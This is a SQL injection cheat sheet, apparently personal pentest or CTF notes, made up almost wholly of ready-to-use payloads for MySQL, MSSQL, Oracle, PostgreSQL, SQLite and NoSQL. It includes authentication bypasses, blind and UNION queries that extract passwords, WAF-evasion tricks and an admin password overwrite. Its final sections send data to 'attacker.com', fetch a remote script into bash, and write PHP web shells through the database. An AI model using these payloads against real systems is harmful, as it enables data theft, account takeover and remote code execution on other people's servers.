
SQL Injection

  • Bypass Techniques

    White Space > SELECT/**/1
    Hex > select concat(0x31333337,0x206840783072)
    CHR and String Concatenation > #SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
    Hex > 0x61646D696E ( admin )
    
    Ex:
    	select convert_from(decode('QVdBRQ==', 'base64'), 'utf-8');
    
    Limit = Just limit lol
    
    	
     
  • First things to test

    dbms_pipe.receive_message(('a'),10)--
    WAITFOR DELAY '0:0:10'#
    ;SELECT pg_sleep(10)--
    6377 
    `';%20waitfor%20delay%20'0:0:6'%20--%20`
    `' OR 1=1 --[SPACE]`
    NoSQL: foo'||1||'
    			
    Append Examples >
    	%'asd
    	cookie'||pg_sleep(10)--
    	14 and if(1=1, sleep(15), false)--
    	admin');SELECT PG_SLEEP(5)--
    
    'XOR(SELECT(0)FROM(SELECT(SLEEP(20)))a)XOR'Z
  • MARIADB

    ' OR 1=1 --[SPACE]
    admin' and extractvalue(0x0a,concat(0x0a,(select group_concat(table_name) from information_schema.tables where table_schema=database())));-- -
    admin' and extractvalue(0x0a,concat(0x0a,(select concat(username, ':', password) from users)));--
    admin' and extractvalue(0x0a,concat(0x0a,(select version())));--
  • Oracle

    **String concatenation >** 'foo'||'bar'
    **Substring >** SUBSTR('foobar', 4, 2)
    **Comment >** --
    **Database version >** SELECT banner FROM v$version
                           SELECT version FROM v$instance
    **DB Contents >** SELECT * FROM all_tables  
    						  SELECT * FROM all_tab_columns WHERE table_name='table'
    
    **Time Delay >** dbms_pipe.receive_message(('a'),10)
    
  • Microsoft And MYSQL

    **String concatenation** > 'foo'+'bar'
    **Substring** > SUBSTRING('foobar', 4, 2)
    **Comment** > --, #(MYSQL)
    **Database version** > SELECT @@version
    **DB Contents** > 
    				SELECT * FROM information_schema.tables
    				SELECT * FROM information_schema.columns WHERE table_name='table'
    
    **Time Delay** > WAITFOR DELAY '0:0:10'
    
    
  • PostgreSQL

    **String concatenation** > 'foo' || 'bar'
    **Substring** > SUBSTRING('foobar' FROM 4 FOR 2)
    **Comment** > --
    **Database version** > SELECT version()
    **DB Contents** >
                SELECT * FROM information_schema.tables
                SELECT * FROM information_schema.columns WHERE table_name='table'
    
    **Time Delay** > SELECT pg_sleep(10);
    
    
  • NoSQL

    # Authentication bypass
    {"username":{"$ne":""},"password":{"$ne":""}}
    {"username":"admin","password":{"$gt":""}}
    {"username":{"$regex":"admin.*"},"password":{"$ne":""}}
    {"username":{"$in":["admin","administrator"]},"password":{"$ne":""}}
    
    # Operator injection
    {"username":"admin","password":{"$regex":"^a"}}   # extract password char by char
    {"username":"admin","password":{"$regex":"^a.*"}}
    
    # URL parameter injection (Express/Mongoose)
    username=admin&password[$ne]=x
    username[$regex]=admin.*&password[$ne]=x
    username=admin&password[$gt]=
    username[$nin][]=admin&password[$ne]=x
    
    # NoSQL injection in JSON
    {"$where": "this.username == 'admin' && this.password.match(/^a.*/)"}
    {"$where": "sleep(5000)"}
    {"username": {"$gt": ""}, "password": {"$gt": ""}}
    
    # MongoDB-specific
    ' || 1==1//
    ' || 1==1%00
    admin' || '' == '
    {"$gt": ""}
  • Blind SQL Injection Payloads

    DB wasn't Oracle (using SUBSTRING)
    Conditional response 
    **Injected Cookie >** =xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'administrator'), 16, 1)='a
    
    DB was Oracle
    Conditional error
    Injected Cookie > =xyz'||(SELECT CASE WHEN SUBSTR(password,17,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    
  • Union Payloads

    'ORDER BY 2--
    'UNION SELECT null,null--
    'UNION SELECT null, username||'~'||password FROM users--
    'UNION SELECT banner,null from v$version--
    'UNION SELECT '@@version',null#
    'UNION SELECT null, column_name from information_schema.tables where table_name = users_bvqamp--
     
     
     
    
  • Examples

    	Error based = select/**/(substring((select/**/version()),1,1))='5';
    	https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
    	
    	admin' and extractvalue(0x0a,concat(0x0a,(select substring(password, 11, 10) from users limit 1)));-- -
    
    admin' and extractvalue(0x0a,concat(0x0a,(select substring(password, 21, 10) from users limit 1)));-- -
  • SQLMAP

     sqlmap -r req.txt -p "item" --dbms sqlite -D SQLite_masterdb -T flags18999e4de24f117351f28f01382746e3 --dump
  • Update

    ', password='008c70392e3abfbd0fa47bbc2ed96aa99bd49e159727fcba0f2e6abeb3a9d601' WHERE name='Admin'-- -
    
    sqlite:
    	',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='
    	',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
    	',nickName=(SELECT group_concat(id || "," || author || "," || secret || ":") from secrets),email='
    	' UNION SELECT 1,group_concat(password) FROM users-- -
    // group_concat ( dump all columns )
  • WAF Bypass Advanced

    # Comment-based
    /*!50000UNION*//*!50000SELECT*/1,2,3
    UN/**/ION SE/**/LECT 1,2,3
    /*!UNION*/ /*!SELECT*/ 1,2,3
    
    # Case manipulation
    uNiOn SeLeCt 1,2,3
    UnIoN/**/sElEcT 1,2,3
    
    # Encoding
    UNION%0aSELECT 1,2,3             # newline
    UNION%0dSELECT 1,2,3             # carriage return
    UNION%09SELECT 1,2,3             # tab
    UNION%a0SELECT 1,2,3             # non-breaking space
    UNI%4fN SELECT 1,2,3             # hex encode O
    
    # String concatenation (bypass keyword detection)
    CONCAT(0x73656C656374)           # 'select' in hex
    CHAR(115,101,108,101,99,116)     # 'select' via CHAR
    
    # No spaces
    (SELECT(1))
    UNION(SELECT(1),(2),(3))
    'OR'1'='1
    'AND(1)=(1)--
    
    # Scientific notation bypass
    0e1union(select(1),2,3)
    
    # HPP (split across params)
    ?id=1&id=' UNION SELECT 1,2,3--
  • Second Order SQLi

    # Payload stored in DB, executed later in different query
    # Register username: admin'--
    # When app uses stored username in query without sanitization
    # e.g., SELECT * FROM users WHERE username='admin'--'
    
    # Register with: ' UNION SELECT password FROM users WHERE username='admin'--
    # View profile later -> triggers the injection
  • Out-of-Band (OOB) Exfiltration

    # MySQL
    SELECT LOAD_FILE(CONCAT('\\\\',version(),'.attacker.com\\a'))
    SELECT * INTO OUTFILE '\\\\attacker.com\\share\\output.txt'
    
    # MSSQL
    EXEC master..xp_dirtree '\\attacker.com\share'
    ; EXEC xp_fileexist '\\attacker.oastify.com\a'
    
    # PostgreSQL
    COPY (SELECT version()) TO PROGRAM 'curl attacker.com'
    CREATE TABLE test(data text); COPY test FROM PROGRAM 'id';
    
    # Oracle
    SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual
    SELECT DBMS_LDAP.INIT(('attacker.com',80) FROM dual
  • RCE via SQLi

    # MySQL - INTO OUTFILE (write webshell)
    ' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'--
    
    # MSSQL - xp_cmdshell
    '; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
    '; EXEC xp_cmdshell 'whoami';--
    
    # PostgreSQL - COPY TO PROGRAM
    '; COPY (SELECT '') TO PROGRAM 'curl attacker.com/shell.sh|bash';--
    '; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id';--
    
    # SQLite - attach database + write webshell
    '; ATTACH DATABASE '/var/www/html/shell.php' AS pwn; CREATE TABLE pwn.shell(payload text); INSERT INTO pwn.shell VALUES('<?php system($_GET["cmd"]);?>');--